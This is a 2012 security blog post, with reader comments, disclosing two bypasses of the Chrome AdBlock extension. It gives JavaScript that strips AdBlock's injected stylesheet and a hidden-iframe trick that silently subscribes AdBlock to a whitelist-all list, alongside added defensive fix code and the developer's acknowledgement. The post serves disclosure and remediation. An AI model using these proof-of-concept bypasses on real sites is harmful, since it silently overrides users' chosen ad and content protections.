Tuesday, March 27, 2012

Chrome addons hacking: Bye Bye AdBlock filters!

Continuing the Chrome extension hacking series (see part 1 and 2), this time I'd like to draw your attention to the oh-so-popular AdBlock extension. It has over a million users, is actively maintained and is a great piece of software (heck, even I use it!). However, due to how Chrome extensions work in general, it is still relatively easy to bypass it and display some ads. Let me describe two distinct vulnerabilities I've discovered. Both are exploitable in the newest version, 2.5.22.

tl;dr: Chrome AdBlock 2.5.22 bypasses, demo here and here, but I'd advise you to read on.


If you want to analyze the extension code yourself, use my download script to fetch the addon from Chrome Web Store and read on:
// you need PHP with openssl extension and command line unzip for this
$ mkdir addons
$ php download.php gighmmpiobklfepjocnamgkkbiglidom AdBlock
Of course, you don't need to, but if you don't it makes me sad :/

Small bypass - disabling filter injection

Like many Chrome extensions, AdBlock alters the content of the web pages you see by modifying the page DOM. For example, it injects a <link rel=stylesheet> that hides all ads with CSS. This all happens in adblock_start_common.js:
function block_list_via_css(selectors) {
  var d = document.head || document.documentElement;
  // Issue 6480: inserting a <style> tag too quickly made it be ignored.
  // Use ABP's approach: a <link> tag that we can check for .sheet.
  var css_chunk = document.createElement("link");
  css_chunk.type = "text/css";
  css_chunk.rel = "stylesheet";
  css_chunk.href = "data:text/css,";
  d.insertBefore(css_chunk, null);
  // ... and fill the node contents later on
}
Sweet & cool, right? But the problem is that websites have tons of ways to defend themselves from being altered. After all, it's their DOM you're messing with. So, the easiest bypass would be to listen for anyone adding a stylesheet and remove it:
function block(node) {
    if (   (node.nodeName == 'LINK' && node.href == 'data:text/css,') // new style
        || (node.nodeName == 'STYLE' && node.innerText.match(/^\/\*This block of style rules is inserted by AdBlock/)) // old style
        ) {
        node.parentNode.removeChild(node); // drop the injected stylesheet
    }
}

document.addEventListener("DOMContentLoaded", function() {
    document.addEventListener('DOMNodeInserted', function(e) {
        // disable blocking styles inserted by AdBlock
        block(e.target);
    }, false);
}, false);
As a result, the stylesheet is removed and the ads are not hidden anymore. See it in the demo. This is similar to how many Chrome extensions work. Extension authors should remember that you can't rely on the page DOM to be cool with you; it can actively prevent modification. In other words, it's not your backyard, behave.
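As an added example (not AdBlock's code), here is how an extension could verify that its injected stylesheet actually survived the page instead of assuming it did; it goes a little beyond the post by using a sentinel rule so that overridden rules are caught as well as removed nodes. The sentinel class name, the `report` callback and the `win` parameter are assumptions.

```javascript
// Added example, not AdBlock's code: an extension-side check that the injected stylesheet
// survived the page. Assumptions: the extension builds the CSS it injects (so it can append
// a sentinel rule), and `win` is the page window or a test double.

var SENTINEL_CLASS = "__ext_css_sentinel";   // hypothetical class name, unique to the extension
var SENTINEL_RULE = "." + SENTINEL_CLASS + "{display:none !important}";

// Append the sentinel rule to the CSS about to be injected.
function withSentinel(css) {
  return css + "\n" + SENTINEL_RULE;
}

// Classify the fate of the injected <link>. Returns one of:
//   "detached"    - no longer in the document (removed by the page, as the bypass above does)
//   "no-sheet"    - attached, but no CSSStyleSheet was produced for it (the Issue 6480 symptom)
//   "not-applied" - a sheet exists, yet the sentinel is still rendered: the rules are overridden
//   "ok"          - the sentinel is hidden, so the hiding rules are in effect
function stylesheetStatus(link, win) {
  var doc = win.document;
  if (!link || !doc.documentElement.contains(link)) return "detached";
  if (!link.sheet) return "no-sheet";
  var probe = doc.createElement("div");   // throwaway element that only the sentinel rule matches
  probe.className = SENTINEL_CLASS;
  doc.documentElement.appendChild(probe); // must be in the tree to get a computed style
  var hidden = win.getComputedStyle(probe).display === "none";
  doc.documentElement.removeChild(probe);
  return hidden ? "ok" : "not-applied";
}

// Browser-only wiring: check once the page's own scripts have had a chance to run, and hand
// anything but "ok" to the extension's reporting path (a hypothetical `report` callback).
// Re-inserting is an arms race the page can always win, so report rather than retry forever.
function scheduleStylesheetCheck(link, win, report) {
  win.setTimeout(function () {
    var status = stylesheetStatus(link, win);
    if (status !== "ok") report(status);
  }, 1000);
}
```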

Total bypass - Disable AdBlock for good

The previous one was child's play, but the real deal is here. Any website can detect whether you're using Chrome AdBlock and disable it completely for the future. This is possible thanks to a vulnerability in the filter subscription page. The subscription code works by launching the chrome-extension://gighmmpiobklfepjocnamgkkbiglidom/pages/subscribe.html page. Here's what happens:
// pages/subscribe.js
  //Get the URL
  var queryparts = parseUri.parseSearch(document.location.search);
  //Subscribe to a list
  var requiresList = queryparts.requiresLocation ?
      "url:" + queryparts.requiresLocation : undefined;
  // (the call that sends this request to the background page is cut off in this excerpt)
      {id: 'url:' + queryparts.location, requires:requiresList});

First, the query string of the page is parsed, and then a subscription request containing the location parameter is sent to the extension background page. So, when the extension launches subscribe.html?location=http://example.com, this subscribes to a filter list from the URL http://example.com.

All neat, but what extension authors don't know is that standard web pages can load your extension resources too. In the future, extension authors will be able to limit this by using web_accessible_resources, but in the current Chrome 17 it's not possible.

So, what is the easiest way to disable Chrome AdBlock? Make it subscribe to a whitelist-all list:
<iframe style="position:absolute;left:-1000px;" id="abp" src=""></iframe>
document.getElementById('abp').src = 'chrome-extension://'+addon_id + '/pages/subscribe.html?location=' + location.href.replace('disable.html', 'list.txt');
See for yourself in the demo.
To re-enable AdBlock functionality go to the extension settings, choose the filter lists tab and disable the last added filter (the koto.github.com one).

How to fix this in the code? Don't rely on the URL of your extension resource to trigger an action.
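As an added example (not AdBlock's code), here is a subscribe page written so that its URL alone never triggers an action: it validates the query string, refuses to run when framed, and subscribes only on an explicit click. `sendToBackground` is a hypothetical stand-in for the extension's background-page messaging, and the function names are assumptions.

```javascript
// Added example, not AdBlock's code: a subscribe page that treats its own URL as untrusted
// input. The query string only drives a prompt; the request goes out from a click.
// Assumed names: parseSubscribeRequest, initSubscribePage, hypothetical sendToBackground().

var ALLOWED_PROTOCOLS = { "http:": true, "https:": true };

// Parse ?location=...&requiresLocation=... and validate each as an absolute http(s) URL.
// Returns the request object to send, or null when the page should do nothing.
function parseSubscribeRequest(search) {
  var params = new URLSearchParams(search);
  var location = params.get("location");
  var requires = params.get("requiresLocation");
  if (!location) return null;
  var urls = requires ? [location, requires] : [location];
  for (var i = 0; i < urls.length; i++) {
    var parsed;
    try { parsed = new URL(urls[i]); } catch (e) { return null; }     // relative path or garbage
    if (!ALLOWED_PROTOCOLS[parsed.protocol]) return null;             // no file:, data:, chrome-extension:
  }
  return { id: "url:" + location, requires: requires ? "url:" + requires : undefined };
}

// The hidden <iframe> above drives the page without a user. A real user lands on it top-level,
// so refuse to run when framed (defence in depth; web_accessible_resources is the structural fix).
function mayOfferSubscription(win) {
  return win.top === win;
}

// Wire-up: parse, validate, then wait for an explicit click before talking to the background page.
// Returns true when a prompt was shown, false when the request was rejected.
function initSubscribePage(win, sendToBackground) {
  var doc = win.document;
  if (!mayOfferSubscription(win)) { doc.body.textContent = "Refusing to run inside a frame."; return false; }
  var req = parseSubscribeRequest(win.location.search);
  if (!req) { doc.body.textContent = "Invalid subscription request."; return false; }
  var button = doc.createElement("button");
  button.textContent = "Subscribe to " + req.id.slice("url:".length);
  button.addEventListener("click", function () { sendToBackground("subscribe", req); });
  doc.body.appendChild(button);
  return true;
}

if (typeof window !== "undefined") {   // browser only; Node has no window
  initSubscribePage(window, function (name, data) { console.log(name, data); });
}
```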


r9s said...

Nice job.

pogue972 said...

Have you let the author of Adblock know about the sploits?  I don't know coding, so my questions may be stupid.  But, is this more of a Chrome problem, an extension problem (in general), or more like a advertiser cat vs mouse type of thing?

Btw, there is an extension (you may or may not be aware of/interested in) for Chrome that's kind of supposed to work like NoScript for Firefox called NoScript, but it's really really in early development and kind of breaks everything. https://code.google.com/p/scriptno/

Zzii said...

And Firefox's adblock is not exploitable because it uses browser-level filters, something Chrome doesn't let you do.

RJ said...

Great article!

michalstanko said...

Thanks for the article, it's very interesting.

Anyway, the best adblock you can have is turning plug-ins (Flash) off, which is super easy in Opera, easy in Chrome, and possible in Firefox with Flashblock (there might be an easier way I don't know about). And then whitelist sites like Gmail, YouTube, Google Maps or Dropbox, which use Flash for something useful.

Wladimir Palant said...

Nice vulnerability you found there. Just a note: Adblock Plus for Chrome is not affected, only Adblock. As to CSS tricks - yes, that's a Chrome limitation and not something that extension authors can currently fix (Adblock Plus for Firefox is fine).

kkotowicz said...

Yup, we have to wait for webRequest ( http://code.google.com/chrome/extensions/trunk/webRequest.html ) until real ad blocking is supported, so I consider the first vulnerability just a sweet, interesting trick. But you should fix the second one nonetheless ;)

kkotowicz said...

Sorry, I confused the extensions - so many AdBlocks to choose from ;) I've already contacted Michael about the issues. 

Wladimir Palant said...

Yes, it is confusing. Wasn't my idea to name a competing extension "Adblock".

Anyway, I think that Adblock Plus is completely waterproof now. Web pages can no longer mess with extension pages, not even theoretically.

Michael Gundlach said...

Thanks for the heads up, Krzysztof.  The next release of AdBlock will fix the second vulnerability.  As Wladimir mentioned, the first only prevents hiding rules from working, though blocking will still work.

James Edward Lewis said...

It's ScriptNo, and once you start Trusting a few sites it doesn't seem to break anything anymore; in this respect it is like NoScript's default setup. Also it's fairly mature by now, having switched over to using the ContentSettings and WebRequest APIs available with Chrome 17.

It doesn't, however, have some of the more advanced functionality of NoScript, like surrogate scripts, the XSS filter, or the Application Boundaries Enforcer, and it also doesn't block plugins (but the click-to-play flag is available for that, and Chrome blocks most plugins by default anyway) or frames (but Better Popup Blocker works well for that).

EliSklar said...

"After all, it's their DOM your messing with"
I'm not usually a grammar nazi, but this "your" just makes me cringe.

kkotowicz said...

Agrh, fixed, thanks!

Marshal Walker said...

Thanks for telling all the spammers 

Anonim said...

Doesn't work on AdBlock Plus ;D



I don't want sex ads on my wall on pinterest and ad block was working perfectly, now it's not and they are back. I want them off. I'm my pinterest account and I have thousands of followers. I dont' really want to see dirty derik cums for you on my wall!  I'm pretty pissed.  How do I get it off my walls. Disgusted! 

Noreply said...

"After all, it's their DOM you're messing with"

on their server it is.  In my cache it is MINE to alter as I please for my selective viewing

HumminGly said...

1loopback proxy adblocking is not affected.  AdBlock (Plus) ought to offer this model as an alternative.  xulrunner?

[at] kotowicz : ScriptNo (chromium)

HumminGly said...

" a advertiser cat vs mouse type of thing?"

Guess who always wins?

(hint: not the ad servers)

Assburger said...

I am using adblock on this blog, eat shit

Vinayak Sutar-Patil said...

Nice stuff indeed! You have provided very good information in details.

Nico said...

Does this still work?
